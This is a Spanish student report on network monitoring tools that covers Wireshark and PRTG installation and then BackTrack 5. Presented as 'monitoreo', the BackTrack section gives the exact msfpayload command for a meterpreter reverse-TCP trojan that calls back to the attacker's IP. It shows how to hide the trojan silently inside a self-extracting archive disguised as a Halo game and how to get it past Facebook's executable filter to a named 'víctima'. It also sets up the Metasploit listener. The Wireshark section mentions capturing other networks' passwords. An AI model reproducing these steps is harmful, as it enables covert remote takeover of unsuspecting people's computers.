+ All Categories
Home > Documents > Monitoreo de Redes

Monitoreo de Redes

Date post: 30-Jan-2016
Category:
Upload: marco-franco-aparicio
View: 91 times
Download: 0 times
Share this document with a friend
Description:
Monitoreo de Dispositivos en una red con Back Track 5R3 y Kali Linux
96
Software para el Monitoreo de Redes Asignatura: Administración de redes de computadoras Equipo: Mata Mendoza Jannet Hernández Orgaz José Javier Franco Aparicio Marco Barmori Saviñon Alvarez Ary Noe Juárez Olvera Mereció Gildardo Docente: Ing. José Martin Cruz Domínguez
Transcript
Page 1: Monitoreo de Redes

0

Software para el Monitoreo

de Redes

Asignatura:

Administración de redes de

computadoras

Equipo:

Mata Mendoza Jannet

Hernández Orgaz José Javier

Franco Aparicio Marco Barmori

Saviñon Alvarez Ary Noe

Juárez Olvera Mereció Gildardo

Docente:

Ing. José Martin Cruz Domínguez

Page 2: Monitoreo de Redes

Contenido Que es el Monitoreo de redes. ..................................................................................................... 2

Herramientas para el Monitoreo de Redes ................................................................................... 3

WIRESHARK ............................................................................................................................... 3

Instalación ............................................................................................................................. 3

Practica Captura de paquetes con Wireshark. .................................................................... 10

Conclusión de la práctica .................................................................................................... 14

PRTG ........................................................................................................................................ 15

Instalación ........................................................................................................................... 15

Practica ................................................................................................................................ 22

Anexos ................................................................................................................................. 30

BACK TRACK............................................................................................................................. 31

Requerimientos mínimos. ................................................................................................... 32

Costo.................................................................................................................................... 32

Booteo de Back Track 5 r3 ................................................................................................... 32

Instalación de Back Track 5 r3 ............................................................................................. 36

Practica: Monitoreo con Back Track. ................................................................................... 41

Ocultar virus en un archivo auto extraíble. ......................................................................... 46

Mandar un virus a través de internet (Facebook). .............................................................. 54

Resultados. .......................................................................................................................... 67

Conclusión. .......................................................................................................................... 68

Referencias .......................................................................................................................... 69

Kali Linux. .................................................................................................................................... 70

Instalación de Kali Linux en Vmware Workstation 11.0 ...................................................... 70

Práctica en Kali Linux ........................................................................................................... 86

Conclusiones........................................................................................................................ 95

Referencias .......................................................................................................................... 95

Page 3: Monitoreo de Redes

2

Que es el Monitoreo de redes.

El análisis y monitoreo de redes hoy en día Las redes de cómputo de las organizaciones, se

vuelven cada vez más complejas y la exigencia de la operación es cada vez más demandante. Las

redes, cada vez más, soportan aplicaciones y servicios estratégicos de las organizaciones.

Por lo cual el análisis y monitoreo de redes se ha convertido en una labor cada vez más

importante y de carácter pro-activo para evitar problemas. Anteriormente, cuando no existían

las herramientas que hoy existen, era necesario contratar a una empresa especializada para esta

labor, con un costo muy elevado. Las herramientas que nos sirven para este análisis que le

permiten, a Ud. mismo, realizar esta importante labor, y contar un sistema experto como aliado,

que le ayuda en la interpretación de los resultados obtenidos.

Un sistema o herramienta de monitoreo de red busca problemas causados por la sobrecarga y/o

fallas en los servidores, como también problemas de la infraestructura de red (u otros

dispositivos).

Por ejemplo, para determinar el estatus de un servidor web, software de monitoreo puede

enviar, periódicamente, peticiones HTTP(Protocolo de Transferencia de Hipertexto) para

obtener páginas; para un servidor de correo electrónico, enviar mensajes mediante SMTP

(Protocolo de Transferencia de Correo Simple), para luego ser retirados mediante IMAP

(Protocolo de Acceso a Mensajes de Internet) o POP3 (Protocolo Post Office).

La administración del rendimiento se puede dividir en 2 etapas:

monitoreo y análisis.

Administración de fallas.

Page 4: Monitoreo de Redes

Herramientas para el Monitoreo de Redes WIRESHARK

Wireshark, antes conocido como Ethereal, es un analizador de protocolos utilizado para realizar

análisis y solucionar problemas en redes de comunicaciones, para desarrollo de software y

protocolos, y como una herramienta didáctica. Cuenta con todas las características estándar de

un analizador de protocolos de forma únicamente hueca.

La funcionalidad que provee es similar a la de tcpdump, pero añade una interfaz gráfica y muchas

opciones de organización y filtrado de información. Así, permite ver todo el tráfico que pasa a

través de una red (usualmente una red Ethernet, aunque es compatible con algunas otras)

estableciendo la configuración en modo promiscuo. También incluye una versión basada en

texto llamada tshark. Permite examinar datos de una red viva o de un archivo de captura salvado

en disco. Se puede analizar la información capturada, a través de los detalles y sumarios por

cada paquete. Wireshark incluye un completo lenguaje para filtrar lo que queremos ver y la

habilidad de mostrar el flujo reconstruido de una sesión de TCP.

Wireshark es software libre, y se ejecuta sobre la mayoría de sistemas operativos Unix y

compatibles, incluyendo Linux, Solaris, FreeBSD, NetBSD, OpenBSD, Android, y Mac OS X, así

como en Microsoft Windows.

Instalación

Para poder descargar Wireshark es necesario acudir a este URL:

https://www.wireshark.org/

Ilustración 1 Wireshark

Te saldrá la siguiente pantalla le darás clic en donde dice Download.

Page 5: Monitoreo de Redes

4

Ilustración 2 Selección de descarga de wireshark

Después seleccionaras el archivo que sea deseas ya sea para x64 o la de x32.

Le das clic a la opción que desees y empezara la descarga.

Una vez descargado el programa nos vamos a la carpeta donde se guardó dicho

archivo.

Ilustración 3 Icono de Wireshark

Una vez encontrado el archivo que se descargó se debe dar doble clic al archivo para

poderlo instalar.

Page 6: Monitoreo de Redes

Ilustración 4 proceso de instalación de wireshark

Aparecerá esta ventana y le darás clic en Next.

Ilustración 5 Proceso de instalación de wireshark 1.2

Aparecerá la ventana donde se muestran las condiciones de la licencia, le darás clic

en I Agree.

Page 7: Monitoreo de Redes

6

Ilustración 6 Proceso de instalación de wireshark 1.3

En esta pantalla puede elegir que instalar por lo general lo dejas como esta

predeterminado, para esto le darás clic en Next.

Ilustración 7 Proceso de instalación de wireshark 1.4

En esta ventana te sugiere si deseas agregar el icono del programa a menú de inicio o

a la barra de tareas o en otro caso hacer un icono de acceso directo en el escritorio, al

igual de que si deseas asociar el programa con una lista de extensiones, si deseas

hacerlo seleccionas las opciones deseadas y en cuanto que no deseas hacer nada de

lo anterior no seleccionas nada y le das clic en Next.

Page 8: Monitoreo de Redes

Ilustración 8 Proceso de instalación de wireshark 1.5

En esta ventana se indica de manera predeterminada donde se instalara el programa,

se le dará clic en Next.

Ilustración 9 Proceso de instalación de wireshark 1.6

Después aparecerá esta ventana y te pedirá que instales WinPcap, si no estás seguro

de que es este programa dándole clic en What is WinPcap y se abrirá una página web

y te explicara por qué debes instalarlo, para después darle clic en Install.

Page 9: Monitoreo de Redes

8

Ilustración 10 Proceso de instalación de wireshark 1.7

Aparecerá esta ventana donde se aprecia que la instalación ha comenzado.

Ilustración 11 Proceso de instalación de wireshark 1.8

Una vez completada la instalación se verá como esta ventana solo queda darle clic en

Next.

Page 10: Monitoreo de Redes

Ilustración 12 Proceso de instalación de wireshark 1.9

En esta ventana podrás seleccionar si deseas ejecutar el programa o mostrar noticias

nuevas acerca del software.

Para poder finalizar solo seleccionamos la opción deseada y le damos clic en Finish.

Ilustración 13 Proceso de instalación de wireshark 1.10

Te aparecerá una ventana como está puedes darle cli en ok y cada que abras el software

te seguirá saliendo ese cuadro de dialogo o solo seleccionas el cuadrito y luego le das

clic en ok y ya no te volverá a salir.

Page 11: Monitoreo de Redes

10

Ilustración 14 Proceso de instalación de wireshark 1.11

Si seguiste al pie de la letra los pasos anteriores podrás observar esta pantalla la cual

muestra la pantalla principal del programa y habrás finalizado la instalación de

Wireshark.

Practica Captura de paquetes con Wireshark.

Para poder capturar algunos paquetes que circulan en nuestra red es necesario hacer

lo siguiente.

Abrir el programa Wireshark.

Ilustración 15 Ventana principal de Wireshark

Page 12: Monitoreo de Redes

Aparecerá la siguiente pantalla.

Ilustración 16 Entorno de trabajo de Wireshark

Le daremos clic en el icono de captura de paquetes, el cual es el primero de la barra.

Ilustración 17 Icono de selección de tarjeta de red.

Ilustración 18 Selección de tarjeta de red.

Una vez que le dimos clic saldrá esta ventana y deberemos de seleccionar la interface

que vamos a utilizar para escuchar el tráfico de red podemos seleccionar la de wifi o la

de Ethernet. Y le damos clic en Start.

Page 13: Monitoreo de Redes

12

Ilustración 19 Captura de paquetes en la red

El programa empezara a escuchar la red y mostrara en pantalla todo el tráfico de

paquetes en la red.

Ilustración 20 Filtro de paquetes en Wireshark.

Podemos seleccionar el tipo de filtrado que deseamos hay un extenso menú en la parte

donde dice filter.

Ilustración 21 Comandos del tipo de filtrado.

En este caso seleccionaremos el comando ip.addr == y utilizaremos algún nodo que

forme parte de la red para ver los paquetes que está enviando y recibiendo. En este

caso utilizamos la dirección 192.168.1.71.

Page 14: Monitoreo de Redes

El comando seria ip.addr==192.168.1.71.

Ilustración 22 Paquetes capturados.

Entonces la pantalla siguiente lo que nos muestra son los paquetes que envía y recibe

el nodo que tenga como dirección 192.168.1.71.

Podemos observar 3 zonas de datos.

La primera zona del listado de paquetes capturados.

Ilustración 23 Zona de paquetes de datos en Wireshark.

Área de captura lo referente al paquete pero está cifrado.

Ilustración 24 Zona de información sobre paquetes capturados.

Page 15: Monitoreo de Redes

14

Ethernet.

Ilustración 25 Cabecera ethernet del contenido.

Nos muestra la cabecera Ethernet y nos muestra todo el contenido.

La cabecera son los primeros 6 dígitos son destino y los otros 6 son del origen y los dos

bite son el protocolo en el que viaja el paquete y nos muestra lo referente al paquete

pero no se puede leer ya que esta encriptado.

Conclusión de la práctica

Con este programa podemos monitorear nuestra red, ver que paquetes viajan por la red

y podemos capturar paquetes, cookies, contraseñas de otras redes que estén al alcance

de nuestro adaptador y lo podemos ocupar también para checar que las personas que

estén utilizando la red la usen de manera adecuada y no estén viendo cosas que no

estén permitido hacer en la red como por ejemplo estar viendo pornografía en una red

dedicada al trabajo escolar.

Page 16: Monitoreo de Redes

PRTG

Monitoriza su red y no requiere de otros programas. Puede ser usado para monitorizar

ordenadores y equipos de red usados en su infraestructura. Simplemente descargue e instale su

versión de PRTG. Cuando la red se cae, por ejemplo los empleados no pueden leer sus e-mails.

Los clientes no pueden comprar los productos. El trabajo se para. La monitorización de redes

nos ayuda a mantener un negocio saludable.

Usos:

Evita caídas caras.

Encuentra los cuellos de botella antes que se vuelvan problemas.

Reduce los costes al comprar solo el hardware que usted necesita.

Instalación

Para poder instalar PRTG Network Monitor es necesario descargar la versión adecuada a su

sistema operativo.

Primero debemos descargarlo abriendo en el navegador la siguiente dirección:

https://www.es.paessler.com/prtg

Ilustración 26 página principal de PRTG

Page 17: Monitoreo de Redes

16

Aparecerá la siguiente pantalla seleccionaremos el botón de color verde que dice DESCARGAR

FREEWARE.

Ilustración 27 descargar de PRTG

Después te re direccionara a esta página y le darás clic en el botón de color naranja que dice

descargar.

NOTA: Deberás guardar en un archivo de texto o en una nota lo que dice en detalles de la licencia

después se van a utilizar esos datos.

PRTG Network

Monitor 15.3.19.4027 Setup Freeware and Trial (Stable).exe

Ilustración 28 Icono de PRTG

Una vez descargado el archivo, te diriges a la ubicación del archivo y le darás doble clic.

Ilustración 29 Proceso de instalación de PRTG

Page 18: Monitoreo de Redes

Te aparecerá la siguiente ventana le darás clic en ejecutar.

Ilustración 30 Proceso de instalación de PRTG 1.2

Seleccionaras el idioma y le darás clic en aceptar.

Ilustración 31 Proceso de instalación de PRTG 1.3

Te saldrá esta ventana le darás clic en siguiente.

Ilustración 32 Proceso de instalación de PRTG 1.4

Page 19: Monitoreo de Redes

18

En esta ventana seleccionaras que deseas aceptar el acuerdo y le darás clic en siguiente.

Ilustración 33 Proceso de instalación de PRTG 1.5

Te pedirá que introduzcas una dirección de correo electrónico y después le darás clic en

siguiente.

Ilustración 34 Proceso de instalación de PRTG 1.6

Page 20: Monitoreo de Redes

Llenaras estos datos con lo que guardaste al inicio de la instalación, te pedirá que introduzcas el

nombre de la licencia y la clave, para después darle clic en siguiente.

Ilustración 35 Proceso de instalación de PRTG 1.7

Le darás clic en siguiente.

Ilustración 36 Proceso de instalación de PRTG 1.8

Comenzará la instalación del software.

Page 21: Monitoreo de Redes

20

Ilustración 37 Proceso de instalación de PRTG 1.9

Después inicializara los servicios de PRTG.

Ilustración 38 Proceso de instalación de PRTG 1.10

Aparecerá esto en tu pantalla donde te dirá que el servidor se está iniciando para poder

funcionar.

Page 22: Monitoreo de Redes

Se crearan estos accesos directos en tu escritorio con los cuales podrás abrir la consola del PRTG

y la página principal del mismo software.

Ilustración 40 Pantalla de Consola de PRTG

Al darle clic al icono que dice PRTG Enterprise Console es la pantalla principal de lo que abre.

Ilustración 39 Iconos de PRTG

Page 23: Monitoreo de Redes

22

Ilustración 41 Pantalla principal de PRTG Network Monitor.

Y si le das clic al icono que dice PRTG Network Monitor esta es la pantalla principal de lo que se

ejecuta.

Después de seguir al pie de la letra todo los pasos anteriores ya tienes el software instalado.

Practica

PRTG cuanta con una variedad de sensores con los cuales podemos monitorear

zonas específicas de una red, así mismo nos permite monitorear toda una red o

bien una IP e especifico. Al iniciar a usar PRTG nos da una seria e sensores por

default los cuales ayudan a el monitoreo de la red que estemos conectador o

supervisando.

Ilustración 42 Sensores de dispositivos PRTG

Page 24: Monitoreo de Redes

Para comenzar con la práctica y ver el tipo de monitoreo que tendremos en la

red debemos de crear un grupo, seguido de un dispositivo y finalizando con los

sensores que sean necesarios para monitorear la red.

Podemos crear el grupo personalizado o PRTG nos la opción de crearlo

automáticamente. Dando clic derecho o ubicando nos en la parte de abajo

“Añadir grupo”.

Ilustración 43 Crear grupo nuevo

Ilustración 44 Asignación de nombre del grupo

Page 25: Monitoreo de Redes

24

Una vez creado el grupo creamos un dispositivo.

Ilustración 45 Nuevo dispositivo

Seleccionamos el grupo y en la siguiente ventana agregamos el nombre que

tendrá el dispositivo, damos clic en Continuar.

Ilustración 46 Configuración del dispositivo.

Procedemos agregando los sensores con los cuales se estará trabajando.

Seleccionamos el grupo al cual deseamos agregar un sensor, damos clic en

Page 26: Monitoreo de Redes

Continuar.

Ilustración 47 Selección de grupo de trabajo para agregar un sensor.

En la siguiente ventana seleccionamos el tipo de sensor. En el cual podremos

encontrar que hay sensores para monitorear una página asta para el estado de

una CPU.

Ilustración 48 menú de sensores

En nuestro caso seleccionamos Common Saas Checkl el cual nos sirve para

ver es estado de algunas redes que contienen los navegadores. Asignamos un

nombre y damos clic en continuar.

Page 27: Monitoreo de Redes

26

Ilustración 49 Configuración del servidor.

Podemos aprecias que ya está agregado y que podemos empezar a hacer uso

de él.

Ilustración 50 Common Saas Checkl agregado

Podemos apreciar que aún no hay datos generados en el sensor, pero el

monitoreo ya está en ejecución.

Page 28: Monitoreo de Redes

El estado cambia constante mente dependiendo el uso que se les de alas redes

que se atan monitoreando, en ella podemos apreciar gráficas, estado con fecha,

porcentajes y poder modificar algo si lo es requerido.

Ilustración 51 Grafica de estado de la red.

Page 29: Monitoreo de Redes

28

Ilustración 52 estado de las redes después de un cierto tiempo de monitoreo

Grafica de estado en porcentaje.

Ilustración 53 Estado de la red.

Page 30: Monitoreo de Redes

Información detallada de la grafica.

Ilustración 54 Información detallada de la grafica

Ajustes de Common Saas Checkl en caso de ser necesario

Ilustración 55 Zona de ajustes Common Saas Checkl

Page 31: Monitoreo de Redes

30

Anexos

PRTG cuanta con una manual de ayuda el del cual se obtienen muchas dudas y

a su vez un gran beneficio, también cuanta con tres plataformas que están

disponible en la web, consola para CPU y disponible en dispositivos móviles.

Para así brindarnos un mejor monitoreo de la red y asegurarnos de que no haya

ningún error, cuenta también con un generador de reportes ya sea mensual o

anual mente.

Ilustración 56 Alarma PRTG de errores

Page 32: Monitoreo de Redes

BACK TRACK

Imagen 1 Back Track 5r3

Back Track es una distribución GNU/Linux en formato Live CD pensada y

diseñada para la auditoría de seguridad y relacionada con la seguridad

informática en general. Actualmente tiene una gran popularidad y aceptación en

la comunidad que se mueve en torno a la seguridad informática.

Se deriva de la unión de dos grandes distribuciones orientadas a la seguridad, el

Auditor + WHAX. WHAX es la evolución del Whoppix (WhiteHat Knoppix), el cual

pasó a basarse en la distribución Linux SLAX en lugar de Knoppix.

La última versión de esta distribución cambió el sistema base, antes basado en

Slax y ahora en Ubuntu.10

Incluye una larga lista de herramientas de seguridad aptas para el uso, entre las

que destacan numerosos escáneres de puertos y vulnerabilidades, archivos de

exploits, sniffers, herramientas de análisis forense y herramientas para la

auditoría Wireless. Fue incluida en el puesto 7 de la famosa lista "Top 100

Network Security Tools" de 2006.2

Page 33: Monitoreo de Redes

32

Requerimientos mínimos.

Equipo de cómputo:

Espacio libre en disco duro mínimo 15 GB

Tener al menos un 1 GB en memoria

Procesador 1.66 GHz

Contar con una tarjeta de red inalámbrica en el equipo.

Unidad de CD/DVD en el equipo.

Costo.

Totalmente Gratis.

Booteo de Back Track 5 r3

Para instalar la imagen ISO en equipo de cómputo portátil.

Primero se debe tomar en cuenta como se introducirá el sistema operativo, ya

sea por medio de una USB o por medio de un disco a través de la unidad de CD.

En el caso se tuvo que bootear la imagen en una USB. Para poder hacerlo se

usó el programa “Lili USB Creator”. Permite usar una memoria USB como un

disco de instalación.

Imagen 2 Lili USB Creator Logo

Page 34: Monitoreo de Redes

Para bootear el sistema operativo, basta con abrir el programa.

Imagen 3 Menú de Lili USB Creator

Se debe elegir el dispositivo USB donde se introducirá el sistema operativo.

Imagen 4 Seleccionar memoria para bootear sistema

Page 35: Monitoreo de Redes

34

Luego en el paso 2, seleccionar la ubicación del archivo ISO de Back Track.

Imagen 5 Buscar imagen ISO para bootear

En el caso buscaremos una imagen ISO.

Imagen 6 Selección de imagen ISO Back Track 5 r3

Se presiona el botón “Abrir” y se abra dado la ruta del archivo.

Page 36: Monitoreo de Redes

Imagen 7 Tamaño de resistencia de la imagen

En el tercer paso, tamaño de resistencia no influye en la operación.

Para el cuarto paso se debe elegir unas opciones del booteo, ocultar los archivos

para que no sean borrados por accidente de preferencia. Y formatear dispositivo

a “FAT32” borrando los datos contenidos en la USB.

Imagen 8 Paso número 4 del booteo

Para el paso cinco basta con presionar el botón en forma de rayo color amarillo,

para iniciar la operación de booteo.

Imagen 9 Comenzar a bootear

Page 37: Monitoreo de Redes

36

Cuando en esta misma parte aparezca el mensaje, “El dispositivo está listo para

funcionar”, la memoria esta lista para ser usada e instalar Back Track 5 r3 en el

equipo portátil.

Instalación de Back Track 5 r3

Para conseguir que el equipo de cómputo lea primero la memoria USB, debe

configurarse la opción “Boot” en la BIOS, donde se podrá seleccionar que lea en

primer lugar el puerto USB al que está conectada la memoria, en vez del disco

duro.

Primero aparecerá una pantalla de color negro a la que debemos presionar

“Enter”.

Luego aparece la pantalla de back Track 5, se debe seleccionar la primera opción

presionando “Enter” para continuar.

Imagen 10 Instalación de Back Track Mode Text

Aparecerá una pantalla que indica cargar los archivos del sistema, después

aparece un fondo de pantalla.

Page 38: Monitoreo de Redes

Enseguida aparece una nueva ventana en la cual se indicara que debe ingresar

en el modo grafico de instalación con el comando “startx”.

Imagen 11 Iniciar Modo Grafico

Ahora aparece un escritorio en pantalla, es la interfaz que permitirá instalar el

back Track, dando doble click en el icono del escritorio en forma de dragon

“Install Back Track”.

Imagen 12 Panel de Back Track Live CD

Page 39: Monitoreo de Redes

38

Lo primero que aparecerá será el primer paso de la instalación, donde se debe

seleccionar el idioma y presionar el botón “Adelante”.

Imagen 13 Selección idioma de instalación

El segundo paso es elegir la ubicación del equipo y la zona horaria, una vez

seleccionados basta con presionar el botón “Adelante”.

Page 40: Monitoreo de Redes

En el tercer paso se debe especificar la configuración del teclado, seleccionando

en este caso la opción “sugerida”. Se debe presionar el botón “Adelante” para

continuar.

Imagen 14 Configuración del teclado de instalcion

Ahora en el cuarto paso, se debe especificar la partición del disco que será usada

para almacenar el sistema operativo, es mejor la segunda opción “Especificar

particiones manualmente”, pues en caso de tener otra partición no causarle

daños borrando sus archivos. Presionar “Adelante”.

Imagen 15 Selección de disco o partición para instalación

Page 41: Monitoreo de Redes

40

El paso siete, es dar click en el boton “Instalar”, una vez que se ha configurado

la instalcion. Presionar “Instalar”.

Imagen 16 Mensaje de configuración pre-instalación

La instalación comienza y se muestra en pantalla el porcentaje de instalación.

Imagen 17 Barra de progreso de instalación

Para cuando termina la instalación, es necesario es necesario reiniciar el equipo, en la pantalla aparece el mensaje en

una ventana. Presionar “Reiniciar”. Para cuando arranque, se debe retirar el dispositivo USB, para que lea normalmente

el disco duro de la computadora.

Page 42: Monitoreo de Redes

Practica: Monitoreo con Back Track.

Para comenzar a usar el Back Track en la computadora es necesario iniciar el

sistema operativo prendiendo el computador. Primero pedirá introducir el usuario

y la contraseña. El usuario que se debe introducir es “root” y la contraseña es

“toor”.

Luego debe iniciarse el sistema operativo en modo gráfico con el comando

“startx”.

Imagen 18 Iniciar usuario y contraseña, modo grafico

Luego se podrá entrar al sistema operativo para comenzar el trabajo.

Imagen 19 Escritorio de Back Track 5 r3

Page 43: Monitoreo de Redes

42

Ahora para comenzar probar la práctica, es necesario conectarse a la red, que

servirá para tener comunicación entre el equipo que monitoreara y alguno de los

equipos con Windows que podrá ser monitoreado.

Imagen 20 Error de bus conexión

Al abrir el explorador de redes wifi, mostrara un mensaje de error en un bus de

la computadora. No es un error grave. Basta con presionar el botón “OK”.

Imagen 21 Selección de red inalambrica

Ahora se mostraran las redes disponibles, en este caso la red donde se

encuentran conectados varios equipos en la de nombre “Halo” presionar el botón

“Connect”.

Page 44: Monitoreo de Redes

Ahora se muestra que el equipo está conectado a la red. Obtuvo la dirección IP

192.168.43.8

Imagen 22 Conexión de red inalámbrica de prueba

Ahora es necesario abrir una ventana de comandos o “Terminal”, en esta parte

se pueden escribir los comandos necesarios para usar algunas herramientas de

BackTrack 5 r3, por lo que en este caso se usara la herramienta “Metaexploit”.

Imagen 23 Ventana terminal

Page 45: Monitoreo de Redes

44

Una forma de averiguar la dirección IP que tienen el equipo, es usando el

comando “ifconfig”.

Imagen 24 Comando ifconfig

De esa forma se mostrara la IP ya sea de la antena Wi-fi o cableada.

Imagen 25 Dirección de red inalámbrica

Ahora es necesario abrir una nueva ventana de comandos. Para usar escribir el

comando necesario que creara un troyano, un virus que permitirá el acceso

remoto a un equipo donde sea ejecutado.

Imagen 26 Creación de virus Troyano

Page 46: Monitoreo de Redes

El comando como puede apreciarse es “msfpayload

windows/meterpreter/reverse_tcp LHOST=192.168.43.8 LPORT=9999 x >

/root/Desktop/Mi_troyano.exe”.

El msfpayload es una herramienta que ayuda a crear el troyano.

La instrucción windows significa que será usado para trabajar en sistema

operativo Windows.

La instrucción meterpreter es la que permite usar los comandos o funciones.

La instrucción reverse_tcp significa que usara en una comunicación inversa. La

computadora con Windows que ejecutara el troyano debe estar conectada a la

misma red. Toda la información será mandada a la computadora atacante.

La instrucción LHOST=(IP ATACNTE) se le ordena al troyano a que dirección

IP será mandada la información.

La instrucción LPORT=9999 , es la que indica a través de que puerto de la

computadora se podrá enviar el virus. Muchos puerto de la computadora quedan

abiertos a procesos para poder trabajar, por eso la ocurrencia de monitorear a

través de uno de ellos.

En las últimas líneas solo se designa la ruta donde aparecerá el archivo creado.

La ruta /root/Desktop/Mi_troyano.exe significa que el archivo aparecerá en el

escritorio, se le asigna un nombre en este caso “Mi_troyano.exe”.

El “.exe” significa que se tratara de un programa ejecutable.

Ahora existen varias formas de hacer llegar este virus creado a un equipo de

cómputo, puede ser a través de internet mandándolo comúnmente por internet,

a través de redes sociales como Facebook o a través de un correo electrónico.

El único infortunio es que no permiten cargar archivos ejecutables para mandar,

por obvias razones de seguridad en caso de tratarse de virus.

Page 47: Monitoreo de Redes

46

Ocultar virus en un archivo auto extraíble.

Para introducir el virus y el ejecutable del juego en un mismo archivo auto

extraíble, es necesario elegir ambos archivos, presionar clic derecho sobre ellos

para desplegar una lista de opciones.

Imagen 27 Virus y ejecutable de video juego

Seleccionar la opción “Add to archive”. Aparecerá una ventana para realizar una

configuración.

Imagen 28 Agregar archivos a winrrar

Page 48: Monitoreo de Redes

En la ventana, se debe seleccionar el método de compresión que debe ser

“Best”, el formato del archivo está bien “Rar”. Del extremo derecho se debe

palomear la opción “Create SFX archive”. Se debe asignarle un nombre al

archivo, también designar el tipo de archivo que se creara “.exe”, en este caso

fue (halo5.exe).

Imagen 29 Configuración de pestaña General en winrrar

En la pestaña “Advanced”, presionar el botón “SFX options…”, mostrara otra

ventana de configuración.

Imagen 30 Configuración de pestaña Advanced en winrrar

Page 49: Monitoreo de Redes

48

En esa nueva ventana debemos dar la ruta del archivo actual, por ejemplo la ruta

del archivo ejecutable del juego, para ello seleccionar el archivo, presionar clic

derecho y presionar la opción “propiedades”.

Imagen 31 Propiedades del archivo seleccionado

Copear la ruta para poder pegarla en la ventana de configuración.

Imagen 32 Copiar ruta de archivo seleccionado

Page 50: Monitoreo de Redes

Pegar la ruta en la ventana de configuración en la pestaña “General”, cambiar

las diagonales inversas “\”, por diagonales normales en la ruta “/”.

Imagen 33Introducir ruta en pestaña General

Ir a la pestaña “Setup”, en la parte “Run after extraction” escribir el nombre del

virus con todo y el tipo de archivo, ejemplo: practica1.exe.

En la parte inferior “Run before extraction” escribir el nombre del archivo y el

tipo de archivo que se ejecutara con el virus, ejemplo: haloce.exe.

Imagen 34 Asignación de archivos en pestaña Setup

Page 51: Monitoreo de Redes

50

Ir a la pestaña “Modes”, en la parte “Silent mode” seleccionar la opción “Hide

all”.

Imagen 35 Pestaña Mode Hide all en winrrar

Ir a la pestaña “Update”, en la parte “Ocerwrite mode” elegir la opción “Skip

existing files”.

Imagen 36 Pestaña Update de winrrar Skip existing files

Page 52: Monitoreo de Redes

Para agregar un icono de presentación al archivo se debe ir a la pestaña “Text

and icon”, en la parte “Customize SFX logo and icon”, presionar en la parte

inferior “Load SFX icon the file” botón “Browse”. Se abrirá el explorador de

archivos para elegir un icono, en este caso se descargó el mismo que usa el

juego de video.

Imagen 37 Insertar un icono para el archivo auto estraible

El icono debe ser un archivo tipo “.ico”, o no se mostrara la imagen.

Imagen 38 selección de icono para archivo autoextraíble

Page 53: Monitoreo de Redes

52

Presionar el botón “Abrir”, enseguida el botón “Aceptar”.

Imagen 39 Ruta de icono para archivo

Presionar nuevamente “Aceptar” en la última ventana.

Imagen 40 Aceptar los cambios configurados

Page 54: Monitoreo de Redes

De esta forma comenzara a generar el archivo auto extraíble.

Imagen 41 Creación de archivo autoextraíble

De esta forma se genera el archivo auto extraíble y ejecutable, para poner en

marcha el juego mientras trabaja el virus. En este caso el archivo se llama

“halo5.exe”.

Imagen 42 Nuevo archivo autoextraíble nombre halo5

Page 55: Monitoreo de Redes

54

Mandar un virus a través de internet (Facebook).

Teniendo nuestro archivo auto extraíble al que se le asigno la tarea de ejecutar

en este caso el juego (Halo pc) mientras ejecuta el virus (Troyano) que permitirá

la conexión remota.

Se puede enviar a través de una red social quizás la más común (Facebook).

Esta red social no permite mandar por mensaje archivos (.exe, .bat, .cdm, etc).

Sin embargo en esta práctica se muestra na forma muy fácil de hacerlo. Mandar

un archivo tipo “exe”.

Primero que nada, se muestra la ubicación del archivo autoextraíble creado.

En este caso su nombre es “halo5.jpg”, ejecuta el juego y el virus.

Imagen 43 Archivo listo para enviar por internet

Page 56: Monitoreo de Redes

Importante acceder a la cuenta personal de Facebook, ubicar la opción de

mensajes en la parte superior, “Mostrar todos”. Mostrará cada mensaje personal.

Imagen 44 Enviar desde cuenta de facebook

Seleccionar a la persona que se le enviara el virus, conociendo que tiene la

misma aplicación o en este caso video juego (Halo pc).

Se presiona la opción “Agregar archivo” en la parte inferior de la conversación.

Imagen 45 Adjuntar archivos para enviar en facebbok

Seleccionar el archivo “exe” que se desea enviar. Presionar clic derecho sobre

el archivo, que servirá para desplegar una lista de opciones.

Page 57: Monitoreo de Redes

56

Ya que Facebook no permite enviar archivos “exe”, es importante comprimir el

archivo de una forma distinta desde Facebook.

Imagen 46 Selección de archivo a enviar

De la lista de opciones, seleccionar “Add to archive”.

Imagen 47 Agregar archivo a Zip opciones

Page 58: Monitoreo de Redes

Se abre una ventana, donde se deben configurar unas opciones.

Imagen 48 Creación de archivo Zip para envió

En método de compresión debe seleccionarse “Best”, en tipo de archivo debe

seleccionarse Zip. Por ultimo presionar “Aceptar”.

Ahora se mostrara en la ventana de explorador de archivos, el ejecutable recién

empaquetado.

Imagen 49 Nuevo archivo Zip listo para enviar por facebook

Page 59: Monitoreo de Redes

58

Se elige el archivo en Zip para enviar por Facebook, este comenzara a cargarse.

Y estará listo para enviarse por mensaje, sin ningún problema podrá ser

descargado por la víctima y podrá ser desempaquetado. Nota: Puede que el

archivo al ser desempaquetado sea eliminado por el antivirus.

Imagen 50 Adjuntar archivo Zip por facebook

Este mismo método fue intentado también por medio de “Gmail”. Mandar el virus

autoextraíble a través de Gmail, no fue posible, pues el virus sigue siendo

detectado.

Imagen 51 Error al enviar archivo por gmail

Page 60: Monitoreo de Redes

También puede transferirse el virus a través de un medio físico, como una

memoria “USB”, ejecutándolo en una computadora dentro de la misma red.

Por lo que existan formas de cubrir un virus ocultándolo, a través de otro tipo de

archivos. Pues cualquier antivirus en automático al detectarlo lo eliminaría.

Suponiendo que el archivo fue enviado a una computadora es necesario activar

la herramienta “Metaexploit”.

En una ventalla de comandos, se escribe el comando “msfconsole”.

Imagen 52 Comando msfconsole para abrir Metaexploit

Esto puede tardar un poco.

Cuando cargue la herramienta aparecerá esto en pantalla.

Imagen 53 Metaexploit abierto

Page 61: Monitoreo de Redes

60

Activamos la herramienta para poner en modo escucha y espera, de modo que

esperara la respuesta de algún equipo que activara el virus troyano. De esta

forma se podrá monitorear la computadora.

Imagen 54 Comando use multi/handler

El primer comando para activar es “use multi/handler”.

Imagen 55 comando para activar virus de forma remota

El segundo comando es: “set PAYLOAD Windows/meterpreter/reverse_tcp”.

Sirve para indicar con qué tipo de archivo se realizara la conexión.

Imagen 56 Selección de IP atacante y puerto para el envió de datos

Page 62: Monitoreo de Redes

Luego se indica que debe conectarse a la computadora atacante. Con el

comando “set LHOST (IP DEL ATACANTE)”. Después se indica a través de un

puerto en este caso con el comando “set LPORT 9999”.

Ahora se debe revisar la configuración hecha con otro comando “show options”.

Imagen 57 Comando show para ver configuración del puerto

Es hora de activar “Metaexploit” para que espera una respuesta del virus.

Con el comando “exploit -j”.

